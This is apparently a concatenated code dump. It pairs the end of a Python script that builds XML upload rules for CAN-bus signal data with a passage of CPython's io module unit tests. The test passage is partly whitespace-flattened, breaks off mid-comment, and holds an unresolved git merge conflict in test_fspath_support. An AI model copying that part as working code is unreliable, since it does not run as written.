        afterEventHappen = ET.SubElement(trigger, 'afterEventHappen')
        uploadParameter = ET.SubElement(uploadRuleList, 'uploadParameter')
        sid = ET.SubElement(uploadParameter, 'sid')
        mid = ET.SubElement(uploadParameter, 'mid')
        priority = ET.SubElement(uploadParameter, 'priority')
        zipFlag = ET.SubElement(uploadParameter, 'zipFlag')
        if kwargs['flag'] == 0:
            collectionCondition.text = 'auto_collection'
        elif kwargs['flag'] == 1:
            collectionCondition.text = 'RUN_TIME%' + str(kwargs['RUN_TIME']) + '==0'
        else:
            collectionCondition.text = 'none'
        uploadPeriod.text = str(ulp)
        uploadContentNumber.text = str(ulCN)
        sid.text = str(sd)
        mid.text = str(md)
        priority.text = str(py)
        zipFlag.text = zg
        return uploadRuleList

    def uploadrulelist_change(self, tree):
        """Flatten an <uploadRuleList> element back into a dict of its texts."""
        uploadCondition = tree.find('uploadCondition')
        trigger = uploadCondition.find('trigger')
        uploadParameter = tree.find('uploadParameter')
        collectionCondition_text = tree[0].text
        collectionContent_text = []
        canId = []
        note = []
        for element in tree.findall('collectionContent'):
            collectionContent_text.append(element.text)
        for i in tree.findall('canId'):
            canId.append(i.text)
        for j in tree.findall('note'):
            note.append(j.text)
        uploadPeriod_text = uploadCondition[0].text
        uploadContentNumber_text = uploadCondition[1].text
        event_text = trigger[0].text
        afterEventHappen_text = trigger[1].text
        sid_text = uploadParameter[0].text
        mid_text = uploadParameter[1].text
        priority_text = uploadParameter[2].text
        zipFlag_text = uploadParameter[3].text
        dic = {'collectionCondition': collectionCondition_text, 'collectionContent': collectionContent_text,
               'uploadPeriod': uploadPeriod_text, 'uploadContentNumber': uploadContentNumber_text,
               'event': event_text, 'afterEventHappen': afterEventHappen_text, 'sid': sid_text,
               'mid': mid_text, 'priority': priority_text, 'zipFlag': zipFlag_text,
               'canId': canId, 'note': note}
        # print(dic)
        return dic

    def sava_uploadrulelist(self, node, xmlpath):
        """Append `node` under <data> in the XML file at `xmlpath`.

        NOTE: method name spelling ("sava") is kept — callers use it.
        """
        # BUGFIX: the original existence probe `open(xmlpath)` leaked a file
        # descriptor; close it immediately instead.
        try:
            with open(xmlpath):
                pass
        except Exception as e:
            print(e)
            return
        tree = ET.parse(xmlpath)
        root = tree.getroot()
        data = root.find('data')
        print(node.find('collectionCondition'))  # debug print kept from original
        # Use `is not None` — Element truthiness is deprecated/misleading.
        if node.find('collectionCondition') is not None:
            # Upload-rule nodes carry helper canId/note children that must not
            # be persisted; strip them before appending.
            for i in node.findall('canId'):
                node.remove(i)
            for j in node.findall('note'):
                node.remove(j)
        data.append(node)
        tree.write(xmlpath, encoding='utf-8')

    def deviceStorage(self, max, df3):
        """Build a <deviceStorage> element from a max size and a DataFrame of
        (usedStorageScale, collectLevelGE) degrade conditions."""
        deviceStorage = ET.Element("deviceStorage")
        maxStorageSize = ET.SubElement(deviceStorage, 'maxStorageSize')
        maxStorageSize.text = str(max)
        usedStorageScale_text = list(df3["usedStorageScale"])
        collectLevelGE_text = list(df3["collectLevelGE"])
        for i in range(len(usedStorageScale_text)):
            degradeCollectCondition = ET.SubElement(deviceStorage, 'degradeCollectCondition')
            usedStorageScale = ET.SubElement(degradeCollectCondition, 'usedStorageScale')
            usedStorageScale.text = str(usedStorageScale_text[i])
            collectLevelGE = ET.SubElement(degradeCollectCondition, 'collectLevelGE')
            collectLevelGE.text = str(collectLevelGE_text[i])
        return deviceStorage


# File picker: returns the path chosen in a tk open-file dialog.
def choose_data():
    root = tk.Tk()
    root.withdraw()
    fpath = filedialog.askopenfilename()
    """设置按钮显示所有车型的dbc"""
    # for path in fpath:
    #     if not path.endswith('dbc'):
    #         print('文件有误')
    #         exit(0)
    #     else:
    return fpath


# path = choose_data()
if __name__ == '__main__':
    df = pd.DataFrame([[608, 120, 40, 0, 0, 0, 0, 3],
                       [614, 120, 40, 0, 0, 0, 0, 3],
                       [688, 150, 50, 0, 0, 19, 4, 3],
                       [760, 300, 100, 0, 0, 0, 0, 3]
                       ],
                      columns=["canId", "timeout", "sampleCycle", "rollingcounterStartBit",
                               "rollingcounterLenth", "crcStartBit", "crcLenth", "priority"])
    df2 = pd.DataFrame([[760, 'HU_DVRErrorRecord', 'aaaaaaaaaaaa'],
                        [760, 'HU_SDCapacity', 'aaaaaaaaaaaa'],
                        [760, 'HU_DVRSystemImprint', 'aaaaaaaaaaaa'],
                        [760, 'HU_RebroadcastReq', 'aaaaaaaaaaaa'],
                        [760, 'HU_RealTimeReq', 'aaaaaaaaaaaa'],
                        ],
                       columns=["canId", "信号名", "注释"])
    df3 = pd.DataFrame([[0.2, 2],
                        [0.7, 3]
                        ],
                       columns=['usedStorageScale', 'collectLevelGE'])
    # path = 'G:/xml/2InfoCAN_S111.dbc'
    path = choose_data()
    d = Data(path)
    # d.search_by_id(598)
    # d.search_by_word('BCM')
    # app = QtWidgets.QApplication(sys.argv)
    # testIns = test()
    # testIns.setupUi(path)
    # testIns.show()
    # sys.exit(app.exec_())
    # d.run()
    # a = d.json_to_table(946,3,1)
    # print(a)
    d.xml_example(df)
    # print(d.xmlpath)
    # d.xmlpath = r'C:/Users/201904622/Desktop/2InfoCAN_S111.xml'
    # rule1 = d.uploadrulelist(flag=0, dataframe=df2)
    # rule2 = d.uploadrulelist(flag=0, dataframe=df2, sd=10000000)
    # d.sava_uploadrulelist(rule1)
    # d.sava_uploadrulelist(rule2)
    # dic = d.uploadrulelist_change(rule1)
    # a = d.deviceStorage(63400, df3)
    # d.sava_uploadrulelist(a)
test_io.py
"""Unit tests for the io module.""" # Tests of io are scattered over the test suite: # * test_bufio - tests file buffering # * test_memoryio - tests BytesIO and StringIO # * test_fileio - tests FileIO # * test_file - tests the file interface # * test_io - tests everything else in the io module # * test_univnewlines - tests universal newline support # * test_largefile - tests operations on a file greater than 2**32 bytes # (only enabled with -ulargefile) ################################################################################ # ATTENTION TEST WRITERS!!! ################################################################################ # When writing tests for io, it's important to test both the C and Python # implementations. This is usually done by writing a base test that refers to # the type it is testing as an attribute. Then it provides custom subclasses to # test both implementations. This file has lots of examples. ################################################################################ import abc import array import errno import locale import os import pickle import random import signal import sys import sysconfig import textwrap import threading import time import unittest import warnings import weakref from collections import deque, UserList from itertools import cycle, count from test import support from test.support.script_helper import ( assert_python_ok, assert_python_failure, run_python_until_end) from test.support import import_helper from test.support import os_helper from test.support import threading_helper from test.support import warnings_helper from test.support.os_helper import FakePath import codecs import io # C implementation of io import _pyio as pyio # Python implementation of io try: import ctypes except ImportError: def byteslike(*pos, **kw): return array.array("b", bytes(*pos, **kw)) else: def byteslike(*pos, **kw): """Create a bytes-like object having no string or sequence methods""" data = bytes(*pos, **kw) obj = 
EmptyStruct() ctypes.resize(obj, len(data)) memoryview(obj).cast("B")[:] = data return obj class EmptyStruct(ctypes.Structure): pass _cflags = sysconfig.get_config_var('CFLAGS') or '' _config_args = sysconfig.get_config_var('CONFIG_ARGS') or '' MEMORY_SANITIZER = ( '-fsanitize=memory' in _cflags or '--with-memory-sanitizer' in _config_args ) # Does io.IOBase finalizer log the exception if the close() method fails? # The exception is ignored silently by default in release build. IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode) def _default_chunk_size(): """Get the default TextIOWrapper chunk size""" with open(__file__, "r", encoding="latin-1") as f: return f._CHUNK_SIZE class MockRawIOWithoutRead: """A RawIO implementation without read(), so as to exercise the default RawIO.read() which calls readinto().""" def __init__(self, read_stack=()): self._read_stack = list(read_stack) self._write_stack = [] self._reads = 0 self._extraneous_reads = 0 def write(self, b): self._write_stack.append(bytes(b)) return len(b) def writable(self): return True def fileno(self): return 42 def readable(self): return True def seekable(self): return True def seek(self, pos, whence): return 0 # wrong but we gotta return something def tell(self): return 0 # same comment as above def readinto(self, buf): self._reads += 1 max_len = len(buf) try: data = self._read_stack[0] except IndexError: self._extraneous_reads += 1 return 0 if data is None: del self._read_stack[0] return None n = len(data) if len(data) <= max_len: del self._read_stack[0] buf[:n] = data return n else: buf[:] = data[:max_len] self._read_stack[0] = data[max_len:] return max_len def truncate(self, pos=None): return pos class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase): pass class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase): pass class MockRawIO(MockRawIOWithoutRead): def read(self, n=None): self._reads += 1 try: return self._read_stack.pop(0) except: 
self._extraneous_reads += 1 return b"" class CMockRawIO(MockRawIO, io.RawIOBase): pass class PyMockRawIO(MockRawIO, pyio.RawIOBase): pass class MisbehavedRawIO(MockRawIO): def write(self, b): return super().write(b) * 2 def read(self, n=None): return super().read(n) * 2 def seek(self, pos, whence): return -123 def tell(self): return -456 def readinto(self, buf): super().readinto(buf) return len(buf) * 5 class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase): pass class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase): pass class SlowFlushRawIO(MockRawIO): def __init__(self): super().__init__() self.in_flush = threading.Event() def flush(self): self.in_flush.set() time.sleep(0.25) class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase): pass class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase): pass class CloseFailureIO(MockRawIO): closed = 0 def close(self): if not self.closed: self.closed = 1 raise OSError class CCloseFailureIO(CloseFailureIO, io.RawIOBase): pass class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase): pass class MockFileIO: def __init__(self, data): self.read_history = [] super().__init__(data) def read(self, n=None): res = super().read(n) self.read_history.append(None if res is None else len(res)) return res def readinto(self, b): res = super().readinto(b) self.read_history.append(res) return res class CMockFileIO(MockFileIO, io.BytesIO): pass class PyMockFileIO(MockFileIO, pyio.BytesIO): pass class MockUnseekableIO: def seekable(self): return False def seek(self, *args): raise self.UnsupportedOperation("not seekable") def tell(self, *args): raise self.UnsupportedOperation("not seekable") def truncate(self, *args): raise self.UnsupportedOperation("not seekable") class CMockUnseekableIO(MockUnseekableIO, io.BytesIO): UnsupportedOperation = io.UnsupportedOperation class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO): UnsupportedOperation = pyio.UnsupportedOperation class MockNonBlockWriterIO: def __init__(self): self._write_stack = [] 
        # No blocker configured until block_on() is called.
        self._blocker_char = None

    def pop_written(self):
        # Return (and clear) everything written so far as one bytes object.
        s = b"".join(self._write_stack)
        self._write_stack[:] = []
        return s

    def block_on(self, char):
        """Block when a given char is encountered."""
        self._blocker_char = char

    def readable(self):
        return True

    def seekable(self):
        return True

    def seek(self, pos, whence=0):
        # naive implementation, enough for tests
        return 0

    def writable(self):
        return True

    def write(self, b):
        b = bytes(b)
        n = -1
        if self._blocker_char:
            try:
                n = b.index(self._blocker_char)
            except ValueError:
                pass
            else:
                if n > 0:
                    # write data up to the first blocker
                    self._write_stack.append(b[:n])
                    return n
                else:
                    # cancel blocker and indicate would block
                    self._blocker_char = None
                    return None
        self._write_stack.append(b)
        return len(b)

class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
    BlockingIOError = io.BlockingIOError

class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
    BlockingIOError = pyio.BlockingIOError


class IOTest(unittest.TestCase):
    # Core tests run against both the C (io) and pure-Python (_pyio)
    # implementations via the C*/Py* subclasses elsewhere in this file.

    def setUp(self):
        os_helper.unlink(os_helper.TESTFN)

    def tearDown(self):
        os_helper.unlink(os_helper.TESTFN)

    def write_ops(self, f):
        # Shared write/seek/truncate exercise; *f* must be a writable,
        # seekable binary stream positioned at 0.
        self.assertEqual(f.write(b"blah."), 5)
        f.truncate(0)
        # NOTE(review): tell() deliberately stays at 5 here — truncate()
        # must not move the file position.
        self.assertEqual(f.tell(), 5)
        f.seek(0)

        self.assertEqual(f.write(b"blah."), 5)
        self.assertEqual(f.seek(0), 0)
        self.assertEqual(f.write(b"Hello."), 6)
        self.assertEqual(f.tell(), 6)
        self.assertEqual(f.seek(-1, 1), 5)
        self.assertEqual(f.tell(), 5)
        buffer = bytearray(b" world\n\n\n")
        self.assertEqual(f.write(buffer), 9)
        buffer[:] = b"*" * 9  # Overwrite our copy of the data
        self.assertEqual(f.seek(0), 0)
        self.assertEqual(f.write(b"h"), 1)
        self.assertEqual(f.seek(-1, 2), 13)
        self.assertEqual(f.tell(), 13)

        self.assertEqual(f.truncate(12), 12)
        self.assertEqual(f.tell(), 13)
        # seek() must reject float positions.
        self.assertRaises(TypeError, f.seek, 0.0)

    def read_ops(self, f, buffered=False):
        # Shared read/readinto/seek exercise; *f* must contain
        # b"hello world\n".  *buffered* additionally tests read()-to-EOF
        # and readinto1().
        data = f.read(5)
        self.assertEqual(data, b"hello")
        data = byteslike(data)
        self.assertEqual(f.readinto(data), 5)
        self.assertEqual(bytes(data), b" worl")
        data = bytearray(5)
        self.assertEqual(f.readinto(data), 2)
        self.assertEqual(len(data), 5)
        # Short readinto() leaves the rest of the buffer untouched.
        self.assertEqual(data[:2], b"d\n")
        self.assertEqual(f.seek(0), 0)
        self.assertEqual(f.read(20), b"hello world\n")
        self.assertEqual(f.read(1), b"")
        self.assertEqual(f.readinto(byteslike(b"x")), 0)
        self.assertEqual(f.seek(-6, 2), 6)
        self.assertEqual(f.read(5), b"world")
        self.assertEqual(f.read(0), b"")
        self.assertEqual(f.readinto(byteslike()), 0)
        self.assertEqual(f.seek(-6, 1), 5)
        self.assertEqual(f.read(5), b" worl")
        self.assertEqual(f.tell(), 10)
        self.assertRaises(TypeError, f.seek, 0.0)
        if buffered:
            f.seek(0)
            self.assertEqual(f.read(), b"hello world\n")
            f.seek(6)
            self.assertEqual(f.read(), b"world\n")
            self.assertEqual(f.read(), b"")
            f.seek(0)
            data = byteslike(5)
            self.assertEqual(f.readinto1(data), 5)
            self.assertEqual(bytes(data), b"hello")

    # First offset past a 32-bit signed position.
    LARGE = 2**31

    def large_file_ops(self, f):
        # Seek/write/truncate beyond 2 GiB; skips when the platform has no
        # large-file support.
        assert f.readable()
        assert f.writable()
        try:
            self.assertEqual(f.seek(self.LARGE), self.LARGE)
        except (OverflowError, ValueError):
            self.skipTest("no largefile support")
        self.assertEqual(f.tell(), self.LARGE)
        self.assertEqual(f.write(b"xxx"), 3)
        self.assertEqual(f.tell(), self.LARGE + 3)
        self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
        self.assertEqual(f.truncate(), self.LARGE + 2)
        self.assertEqual(f.tell(), self.LARGE + 2)
        self.assertEqual(f.seek(0, 2), self.LARGE + 2)
        self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
        # Position is past the new EOF; truncate() must not move it.
        self.assertEqual(f.tell(), self.LARGE + 2)
        self.assertEqual(f.seek(0, 2), self.LARGE + 1)
        self.assertEqual(f.seek(-1, 2), self.LARGE)
        self.assertEqual(f.read(2), b"x")

    def test_invalid_operations(self):
        # Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation for mode in ("w", "wb"): with self.open(os_helper.TESTFN, mode) as fp: self.assertRaises(exc, fp.read) self.assertRaises(exc, fp.readline) with self.open(os_helper.TESTFN, "wb", buffering=0) as fp: self.assertRaises(exc, fp.read) self.assertRaises(exc, fp.readline) with self.open(os_helper.TESTFN, "rb", buffering=0) as fp: self.assertRaises(exc, fp.write, b"blah") self.assertRaises(exc, fp.writelines, [b"blah\n"]) with self.open(os_helper.TESTFN, "rb") as fp: self.assertRaises(exc, fp.write, b"blah") self.assertRaises(exc, fp.writelines, [b"blah\n"]) with self.open(os_helper.TESTFN, "r") as fp: self.assertRaises(exc, fp.write, "blah") self.assertRaises(exc, fp.writelines, ["blah\n"]) # Non-zero seeking from current or end pos self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR) self.assertRaises(exc, fp.seek, -1, self.SEEK_END) def test_optional_abilities(self): # Test for OSError when optional APIs are not supported # The purpose of this test is to try fileno(), reading, writing and # seeking operations with various objects that indicate they do not # support these operations. 
def pipe_reader(): [r, w] = os.pipe() os.close(w) # So that read() is harmless return self.FileIO(r, "r") def pipe_writer(): [r, w] = os.pipe() self.addCleanup(os.close, r) # Guarantee that we can write into the pipe without blocking thread = threading.Thread(target=os.read, args=(r, 100)) thread.start() self.addCleanup(thread.join) return self.FileIO(w, "w") def buffered_reader(): return self.BufferedReader(self.MockUnseekableIO()) def buffered_writer(): return self.BufferedWriter(self.MockUnseekableIO()) def buffered_random(): return self.BufferedRandom(self.BytesIO()) def buffered_rw_pair(): return self.BufferedRWPair(self.MockUnseekableIO(), self.MockUnseekableIO()) def text_reader(): class UnseekableReader(self.MockUnseekableIO): writable = self.BufferedIOBase.writable write = self.BufferedIOBase.write return self.TextIOWrapper(UnseekableReader(), "ascii") def text_writer(): class UnseekableWriter(self.MockUnseekableIO): readable = self.BufferedIOBase.readable read = self.BufferedIOBase.read return self.TextIOWrapper(UnseekableWriter(), "ascii") tests = ( (pipe_reader, "fr"), (pipe_writer, "fw"), (buffered_reader, "r"), (buffered_writer, "w"), (buffered_random, "rws"), (buffered_rw_pair, "rw"), (text_reader, "r"), (text_writer, "w"), (self.BytesIO, "rws"), (self.StringIO, "rws"), ) for [test, abilities] in tests: with self.subTest(test), test() as obj: readable = "r" in abilities self.assertEqual(obj.readable(), readable) writable = "w" in abilities self.assertEqual(obj.writable(), writable) if isinstance(obj, self.TextIOBase): data = "3" elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)): data = b"3" else: self.fail("Unknown base class") if "f" in abilities: obj.fileno() else: self.assertRaises(OSError, obj.fileno) if readable: obj.read(1) obj.read() else: self.assertRaises(OSError, obj.read, 1) self.assertRaises(OSError, obj.read) if writable: obj.write(data) else: self.assertRaises(OSError, obj.write, data) if sys.platform.startswith("win") and 
test in ( pipe_reader, pipe_writer): # Pipes seem to appear as seekable on Windows continue seekable = "s" in abilities self.assertEqual(obj.seekable(), seekable) if seekable: obj.tell() obj.seek(0) else: self.assertRaises(OSError, obj.tell) self.assertRaises(OSError, obj.seek, 0) if writable and seekable: obj.truncate() obj.truncate(0) else: self.assertRaises(OSError, obj.truncate) self.assertRaises(OSError, obj.truncate, 0) def test_open_handles_NUL_chars(self): fn_with_NUL = 'foo\0bar' self.assertRaises(ValueError, self.open, fn_with_NUL, 'w') bytes_fn = bytes(fn_with_NUL, 'ascii') with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) self.assertRaises(ValueError, self.open, bytes_fn, 'w') def test_raw_file_io(self): with self.open(os_helper.TESTFN, "wb", buffering=0) as f: self.assertEqual(f.readable(), False) self.assertEqual(f.writable(), True) self.assertEqual(f.seekable(), True) self.write_ops(f) with self.open(os_helper.TESTFN, "rb", buffering=0) as f: self.assertEqual(f.readable(), True) self.assertEqual(f.writable(), False) self.assertEqual(f.seekable(), True) self.read_ops(f) def test_buffered_file_io(self): with self.open(os_helper.TESTFN, "wb") as f: self.assertEqual(f.readable(), False) self.assertEqual(f.writable(), True) self.assertEqual(f.seekable(), True) self.write_ops(f) with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.readable(), True) self.assertEqual(f.writable(), False) self.assertEqual(f.seekable(), True) self.read_ops(f, True) def test_readline(self): with self.open(os_helper.TESTFN, "wb") as f: f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line") with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.readline(), b"abc\n") self.assertEqual(f.readline(10), b"def\n") self.assertEqual(f.readline(2), b"xy") self.assertEqual(f.readline(4), b"zzy\n") self.assertEqual(f.readline(), b"foo\x00bar\n") self.assertEqual(f.readline(None), b"another line") self.assertRaises(TypeError, f.readline, 
5.3) with self.open(os_helper.TESTFN, "r") as f: self.assertRaises(TypeError, f.readline, 5.3) def test_readline_nonsizeable(self): # Issue #30061 # Crash when readline() returns an object without __len__ class R(self.IOBase): def readline(self): return None self.assertRaises((TypeError, StopIteration), next, R()) def test_next_nonsizeable(self): # Issue #30061 # Crash when __next__() returns an object without __len__ class R(self.IOBase): def __next__(self): return None self.assertRaises(TypeError, R().readlines, 1) def test_raw_bytes_io(self): f = self.BytesIO() self.write_ops(f) data = f.getvalue() self.assertEqual(data, b"hello world\n") f = self.BytesIO(data) self.read_ops(f, True) def test_large_file_ops(self): # On Windows and Mac OSX this test consumes large resources; It takes # a long time to build the >2 GiB file and takes >2 GiB of disk space # therefore the resource must be enabled to run this test. if sys.platform[:3] == 'win' or sys.platform == 'darwin': support.requires( 'largefile', 'test requires %s bytes and a long time to run' % self.LARGE) with self.open(os_helper.TESTFN, "w+b", 0) as f: self.large_file_ops(f) with self.open(os_helper.TESTFN, "w+b") as f: self.large_file_ops(f) def test_with_open(self): for bufsize in (0, 100): f = None with self.open(os_helper.TESTFN, "wb", bufsize) as f: f.write(b"xxx") self.assertEqual(f.closed, True) f = None try: with self.open(os_helper.TESTFN, "wb", bufsize) as f: 1/0 except ZeroDivisionError: self.assertEqual(f.closed, True) else: self.fail("1/0 didn't raise an exception") # issue 5008 def test_append_mode_tell(self): with self.open(os_helper.TESTFN, "wb") as f: f.write(b"xxx") with self.open(os_helper.TESTFN, "ab", buffering=0) as f: self.assertEqual(f.tell(), 3) with self.open(os_helper.TESTFN, "ab") as f: self.assertEqual(f.tell(), 3) with self.open(os_helper.TESTFN, "a") as f: self.assertGreater(f.tell(), 0) def test_destructor(self): record = [] class MyFileIO(self.FileIO): def __del__(self): 
record.append(1) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(2) super().close() def flush(self): record.append(3) super().flush() with warnings_helper.check_warnings(('', ResourceWarning)): f = MyFileIO(os_helper.TESTFN, "wb") f.write(b"xxx") del f support.gc_collect() self.assertEqual(record, [1, 2, 3]) with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.read(), b"xxx") def _check_base_destructor(self, base): record = [] class MyIO(base): def __init__(self): # This exercises the availability of attributes on object # destruction. # (in the C version, close() is called by the tp_dealloc # function, not by __del__) self.on_del = 1 self.on_close = 2 self.on_flush = 3 def __del__(self): record.append(self.on_del) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(self.on_close) super().close() def flush(self): record.append(self.on_flush) super().flush() f = MyIO() del f support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_IOBase_destructor(self): self._check_base_destructor(self.IOBase) def test_RawIOBase_destructor(self): self._check_base_destructor(self.RawIOBase) def test_BufferedIOBase_destructor(self): self._check_base_destructor(self.BufferedIOBase) def test_TextIOBase_destructor(self): self._check_base_destructor(self.TextIOBase) def test_close_flushes(self): with self.open(os_helper.TESTFN, "wb") as f: f.write(b"xxx") with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.read(), b"xxx") def test_array_writes(self): a = array.array('i', range(10)) n = len(a.tobytes()) def check(f): with f: self.assertEqual(f.write(a), n) f.writelines((a,)) check(self.BytesIO()) check(self.FileIO(os_helper.TESTFN, "w")) check(self.BufferedWriter(self.MockRawIO())) check(self.BufferedRandom(self.MockRawIO())) check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())) def test_closefd(self): self.assertRaises(ValueError, self.open, os_helper.TESTFN, 
'w', closefd=False) def test_read_closed(self): with self.open(os_helper.TESTFN, "w") as f: f.write("egg\n") with self.open(os_helper.TESTFN, "r") as f: file = self.open(f.fileno(), "r", closefd=False) self.assertEqual(file.read(), "egg\n") file.seek(0) file.close() self.assertRaises(ValueError, file.read) with self.open(os_helper.TESTFN, "rb") as f: file = self.open(f.fileno(), "rb", closefd=False) self.assertEqual(file.read()[:3], b"egg") file.close() self.assertRaises(ValueError, file.readinto, bytearray(1)) def test_no_closefd_with_filename(self): # can't use closefd in combination with a file name self.assertRaises(ValueError, self.open, os_helper.TESTFN, "r", closefd=False) def test_closefd_attr(self): with self.open(os_helper.TESTFN, "wb") as f: f.write(b"egg\n") with self.open(os_helper.TESTFN, "r") as f: self.assertEqual(f.buffer.raw.closefd, True) file = self.open(f.fileno(), "r", closefd=False) self.assertEqual(file.buffer.raw.closefd, False) def test_garbage_collection(self): # FileIO objects are collected, and collecting them flushes # all data to disk. with warnings_helper.check_warnings(('', ResourceWarning)): f = self.FileIO(os_helper.TESTFN, "wb") f.write(b"abcxxx") f.f = f wr = weakref.ref(f) del f support.gc_collect() self.assertIsNone(wr(), wr) with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.read(), b"abcxxx") def test_unbounded_file(self): # Issue #1174606: reading from an unbounded stream such as /dev/zero. 
zero = "/dev/zero" if not os.path.exists(zero): self.skipTest("{0} does not exist".format(zero)) if sys.maxsize > 0x7FFFFFFF: self.skipTest("test can only run in a 32-bit address space") if support.real_max_memuse < support._2G: self.skipTest("test requires at least 2 GiB of memory") with self.open(zero, "rb", buffering=0) as f: self.assertRaises(OverflowError, f.read) with self.open(zero, "rb") as f: self.assertRaises(OverflowError, f.read) with self.open(zero, "r") as f: self.assertRaises(OverflowError, f.read) def check_flush_error_on_close(self, *args, **kwargs): # Test that the file is closed despite failed flush # and that flush() is called before file closed. f = self.open(*args, **kwargs) closed = [] def bad_flush(): closed[:] = [f.closed] raise OSError() f.flush = bad_flush self.assertRaises(OSError, f.close) # exception not swallowed self.assertTrue(f.closed) self.assertTrue(closed) # flush() called self.assertFalse(closed[0]) # flush() called before file closed f.flush = lambda: None # break reference loop def test_flush_error_on_close(self): # raw file # Issue #5700: io.FileIO calls flush() after file closed self.check_flush_error_on_close(os_helper.TESTFN, 'wb', buffering=0) fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', buffering=0) fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False) os.close(fd) # buffered io self.check_flush_error_on_close(os_helper.TESTFN, 'wb') fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb') fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', closefd=False) os.close(fd) # text io self.check_flush_error_on_close(os_helper.TESTFN, 'w') fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'w') fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 
'w', closefd=False) os.close(fd) def test_multi_close(self): f = self.open(os_helper.TESTFN, "wb", buffering=0) f.close() f.close() f.close() self.assertRaises(ValueError, f.flush) def test_RawIOBase_read(self): # Exercise the default limited RawIOBase.read(n) implementation (which # calls readinto() internally). rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None)) self.assertEqual(rawio.read(2), b"ab") self.assertEqual(rawio.read(2), b"c") self.assertEqual(rawio.read(2), b"d") self.assertEqual(rawio.read(2), None) self.assertEqual(rawio.read(2), b"ef") self.assertEqual(rawio.read(2), b"g") self.assertEqual(rawio.read(2), None) self.assertEqual(rawio.read(2), b"") def test_types_have_dict(self): test = ( self.IOBase(), self.RawIOBase(), self.TextIOBase(), self.StringIO(), self.BytesIO() ) for obj in test: self.assertTrue(hasattr(obj, "__dict__")) def test_opener(self): with self.open(os_helper.TESTFN, "w") as f: f.write("egg\n") fd = os.open(os_helper.TESTFN, os.O_RDONLY) def opener(path, flags): return fd with self.open("non-existent", "r", opener=opener) as f: self.assertEqual(f.read(), "egg\n") def test_bad_opener_negative_1(self): # Issue #27066. def badopener(fname, flags): return -1 with self.assertRaises(ValueError) as cm: open('non-existent', 'r', opener=badopener) self.assertEqual(str(cm.exception), 'opener returned -1') def test_bad_opener_other_negative(self): # Issue #27066. 
def badopener(fname, flags): return -2 with self.assertRaises(ValueError) as cm: open('non-existent', 'r', opener=badopener) self.assertEqual(str(cm.exception), 'opener returned -2') def test_fileio_closefd(self): # Issue #4841 with self.open(__file__, 'rb') as f1, \ self.open(__file__, 'rb') as f2: fileio = self.FileIO(f1.fileno(), closefd=False) # .__init__() must not close f1 fileio.__init__(f2.fileno(), closefd=False) f1.readline() # .close() must not close f2 fileio.close() f2.readline() def test_nonbuffered_textio(self): with warnings_helper.check_no_resource_warning(self): with self.assertRaises(ValueError): self.open(os_helper.TESTFN, 'w', buffering=0) def test_invalid_newline(self): with warnings_helper.check_no_resource_warning(self): with self.assertRaises(ValueError): self.open(os_helper.TESTFN, 'w', newline='invalid') def test_buffered_readinto_mixin(self): # Test the implementation provided by BufferedIOBase class Stream(self.BufferedIOBase): def read(self, size): return b"12345" read1 = read stream = Stream() for method in ("readinto", "readinto1"): with self.subTest(method): buffer = byteslike(5) self.assertEqual(getattr(stream, method)(buffer), 5) self.assertEqual(bytes(buffer), b"12345") def test_fspath_support(self): def check_path_succeeds(path): with self.open(path, "w") as f: f.write("egg\n") with self.open(path, "r") as f: self.assertEqual(f.read(), "egg\n") <<<<<<< HEAD check_path_succeeds(FakePath(os_helper.TESTFN)) check_path_succeeds(FakePath(os.fsencode(os_helper.TESTFN))) ======= check_path_succeeds(FakePath(support.TESTFN)) check_path_succeeds(FakePath(os.fsencode(support.TESTFN))) >>>>>>> 3.9 with self.open(os_helper.TESTFN, "w") as f: bad_path = FakePath(f.fileno()) with self.assertRaises(TypeError): self.open(bad_path, 'w') bad_path = FakePath(None) with self.assertRaises(TypeError): self.open(bad_path, 'w') bad_path = FakePath(FloatingPointError) with self.assertRaises(FloatingPointError): self.open(bad_path, 'w') # ensure that 
